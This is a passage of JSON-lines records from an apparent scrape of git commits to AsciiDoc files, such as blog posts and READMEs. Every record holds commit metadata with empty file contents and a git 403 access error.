iPhone","message":"y2b create post It's time to sell your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-02-Its-time-to-sell-your-iPhone.adoc","new_file":"_posts\/2013-09-02-Its-time-to-sell-your-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f43f057a7c2c36d870acb63f30260047b48a0ab6","subject":"Update 2016-06-07-Hello-World.adoc","message":"Update 2016-06-07-Hello-World.adoc","repos":"lauesa\/Blog,lauesa\/Blog,lauesa\/Blog,lauesa\/Blog","old_file":"_posts\/2016-06-07-Hello-World.adoc","new_file":"_posts\/2016-06-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lauesa\/Blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d8c3c8f53a404f5ca85f844e863632ae11adb60","subject":"Update 2016-07-15-Git-command.adoc","message":"Update 2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de62c7d9aa53861f32994b7ffce28e6b21f3ffa","subject":"Update 2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","message":"Update 2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","new_file":"_posts\/2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5a358c499ab5bc8468aebb7604b1e0cc6d841ab","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"660fa8fcaa5643b44f06a9f9d994e2ce57b60164","subject":"Update 2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","message":"Update 
2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","new_file":"_posts\/2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"907ef9be18e83c1d37e7c06d4198861acd51454a","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-transform-headers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-headers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e254aeea4d31103223bebff7d2e0cdf945c6ed1","subject":"README: Switch recommending Odamex to GZDoom.","message":"README: Switch recommending Odamex to GZDoom.\n\nThe port is now free software and is far more capable than any others\nfor what players will likely want.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5539e7ec620ac5e4b9f8807de2e0fb317e4bba6d","subject":"Update 2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","message":"Update 2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","new_file":"_posts\/2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ab7f8a5ff54423278047b4fe2280539a5bafdb2","subject":"First draft of READ API added.","message":"First draft of READ API added.\n","repos":"moreati\/u2fval,Yubico\/u2fval","old_file":"doc\/REST_API.adoc","new_file":"doc\/REST_API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moreati\/u2fval.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5e82b7c67b1e6918ae7a444f0fd7b29e68d2a3c8","subject":"y2b create post Boxee Box Unboxing \\u0026 Device Overview","message":"y2b create post Boxee Box Unboxing \\u0026 Device Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-03-Boxee-Box-Unboxing-u0026-Device-Overview.adoc","new_file":"_posts\/2011-01-03-Boxee-Box-Unboxing-u0026-Device-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1ec5b7dd3d6da484adf371115a8b4895a0af150","subject":"Add Manual Page for bitcoinj-cli","message":"Add Manual Page for bitcoinj-cli","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"doc\/manpage-bitcoinj-cli.adoc","new_file":"doc\/manpage-bitcoinj-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29133cfb1a0f44d9da837c1609bb0671ef1337c2","subject":"LDAP-279: Included reference to samples in documentation.","message":"LDAP-279: Included reference to samples in documentation.\n","repos":"fzilic\/spring-ldap,jaune162\/spring-ldap,ChunPIG\/spring-ldap,n8rogers\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,eddumelendez\/spring-ldap,fzilic\/spring-ldap,spring-projects\/spring-ldap,thomasdarimont\/spring-ldap,eddumelendez\/spring-ldap,zion64\/spring-ldap,eddumelendez\/spring-ldap,ChunPIG\/spring-ldap,n8rogers\/spring-ldap,n8rogers\/spring-ldap,wilkinsona\/spring-ldap,ChunPIG\/spring-ldap,rwinch\/spring-ldap,eddumelendez\/spring-ldap,jaune162\/spring-ldap,fzilic\/spring-ldap,rwinch\/spring-ldap,thomasdarimont\/spring-ldap,likaiwalkman\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,wilkinsona\/spring-ldap,zion64\/spring-ldap,n8rogers\/spring-ldap,n8rogers\/spring-ldap,thomasdarimont\/spring-ldap,eddumelendez\/spring-ldap,zion64\/spring-ldap,vitorgv\/spring-ldap,eddumelendez\/spring-ldap,thomasdarimont\/spring-ldap,vitorgv\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,vitorgv\/spring-ldap,jaune162\/spring-ldap,likaiwalkman\/spring-ldap,jaune162\/spring-ldap,spring-projects\/spring-ldap,jaune162\/spring-ldap,zion64\/spring-ldap,n8rogers\/spring-ldap,spring-projects\/spring-ldap,wilkinsona\/spring-ldap,wilkinsona\/spring-ldap,vitorgv\/spring-ldap,fzilic\/spring-ldap,thomasdarimont\/spring-ldap,jaune162\/spring-ldap,fzilic\/spring-ldap,ChunPIG\/spring-ldap,ChunPIG\/spring-ldap,wilkinsona\/spring-ldap,ChunPIG\/spring-ldap,vitorgv\/spring-ldap,fzilic\/spring-ldap,spring-projects\/spring-ldap,zion64\/spring-ldap,thomasdarimont\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,spring-projects\/spring-ldap","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rwinch\/spring-ldap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a31f88ecd0ec0aedeb43de56b2db03b4a6fc0a33","subject":"- Start doc for server\/database environment tags","message":"- Start doc for server\/database environment tags\n","repos":"davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,kamransaleem\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,khartec\/waltz","old_file":"docs\/design\/draft\/app_environments\/app_environment.adoc","new_file":"docs\/design\/draft\/app_environments\/app_environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"8c75e3b73dbea72e0ddaec3d5a54237781273af1","subject":"made some changes to week6","message":"made some changes to week6\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e1119ec008716e3f02ebfefaf12117043fb9596","subject":"Update 2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","message":"Update 2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","new_file":"_posts\/2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efdfc72a31ea7a55fe506edf72c3c2bed1555c8","subject":"","message":"\n\nMinor edit","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/2017-07-24 Introduction-to-Filebeat.adoc","new_file":"_posts\/2017-07-24 Introduction-to-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43b8846304fa5583b081636d9a65578569a78355","subject":"Create common-grailsApplicationForge5.adoc","message":"Create common-grailsApplicationForge5.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge5.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41baba66314a68601c30b9169b8d47a8ffcd9aee","subject":"y2b create post The best iPad case on the market?","message":"y2b create post The best iPad case on the market?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-27-The-best-iPad-case-on-the-market.adoc","new_file":"_posts\/2013-03-27-The-best-iPad-case-on-the-market.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f995b7f5c037166e7b029fd367583e3b14fbfaf9","subject":"Update 2018-03-27-Blockchain-Design-considerations.adoc","message":"Update 
2018-03-27-Blockchain-Design-considerations.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-27-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-03-27-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ae984757c49ee2507e53774966b3d64c364a37","subject":"y2b create post New Macbook Air Giveaway! [OPEN]","message":"y2b create post New Macbook Air Giveaway! [OPEN]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-23-New-Macbook-Air-Giveaway-OPEN.adoc","new_file":"_posts\/2013-05-23-New-Macbook-Air-Giveaway-OPEN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c618eb607defdb5ce7edf3a82971de0d242eee7c","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7bc8bcfe4852e8f1ffbeb082b269162520a4d3e","subject":"y2b create post Your Whole Wallet In One Card","message":"y2b create post Your Whole Wallet In One Card","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-03-Your-Whole-Wallet-In-One-Card.adoc","new_file":"_posts\/2017-06-03-Your-Whole-Wallet-In-One-Card.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4afa557ceffe85346b5a2922ec7424cd3f308c8","subject":"y2b create post You Wish You Got THIS For Christmas...","message":"y2b create post You Wish You Got THIS For Christmas...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-25-YouWishYouGotTHISForChristmas.adoc","new_file":"_posts\/2017-12-25-YouWishYouGotTHISForChristmas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b6be836e7688a45e550041802bc120dded5aec3","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 
2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d192b1c123be90656e34330ddf4fac176de0a2e","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c55c33e261b07c1265b6bfb66e49b1cb583e48f0","subject":"endpoint","message":"endpoint\n","repos":"Kronos-Integration\/kronos-service-manager","old_file":"doc\/endpoints.adoc","new_file":"doc\/endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-service-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0ab6ac75ec29112f03f34e74d40b9766327396f9","subject":"Update 2016-04-29-Alone.adoc","message":"Update 2016-04-29-Alone.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-04-29-Alone.adoc","new_file":"_posts\/2016-04-29-Alone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5466cec5a06606f5044e87f09fa3b21fd60b330b","subject":"The task for the second lab","message":"The task for the second lab\n","repos":"slbedu\/javase8-2016","old_file":"lab02\/README.adoc","new_file":"lab02\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dcc98c89e70f4b0d1f11986251cd957cdf06871","subject":"Update 2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","message":"Update 2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","new_file":"_posts\/2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b89e06d30ecfd3d309595deca0d5db01af11d02","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4496d6c6c967cd1ac55669b0210937412a238a","subject":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","message":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a1715ab297d7fc33c0d7f654d86dbb2e7ff51f","subject":"added Readme for Dockerfile explanation (#26)","message":"added Readme for Dockerfile explanation (#26)\n\n","repos":"droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website","old_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/jbpm-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4ef49ec520368d866fb38fc53e2f4b955d0b63f","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/arp\/README.adoc","new_file":"examples\/arp\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed714b01cf86a396520c64eff1579c3340426578","subject":"add alpha8 note","message":"add alpha8 
note","repos":"lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fc6e029b2ab4734ef1bac7c5f6e016bcba4a39d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b3378f7a01de879fd4a964cae0fad1fadd37653","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b23316774b091f96d569f5b0c460422112489e5","subject":"Update 2018-11-11-1.adoc","message":"Update 2018-11-11-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-1.adoc","new_file":"_posts\/2018-11-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3d2061dc3fef29ce20c3b41686c1546ad8f03375","subject":"Worked on Systemd journal file format","message":"Worked on Systemd journal file format\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Systemd journal file format.asciidoc","new_file":"documentation\/Systemd journal file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c3342874f23a0ebc0f94b82f927c1adb22cebcd","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"various\/example-rpc\/readme.adoc","new_file":"various\/example-rpc\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0108ce31ab45cc2d42f4b27eb3fa09f66de9483","subject":"RFD77: change to ECDH for encryption at rest key derivation","message":"RFD77: change to ECDH for encryption at rest key derivation\n","repos":"joyent\/rfd,davepacheco\/rfd,joyent\/rfd,melloc\/rfd,melloc\/rfd,davepacheco\/rfd,davepacheco\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,joyent\/rfd","old_file":"rfd\/0077\/README.adoc","new_file":"rfd\/0077\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"8b7326c2f6828f6d33a94cb6a2ab113ffe772f5b","subject":"RFD 77: the saga continues","message":"RFD 77: the saga continues\n","repos":"joyent\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd","old_file":"rfd\/0077\/README.adoc","new_file":"rfd\/0077\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 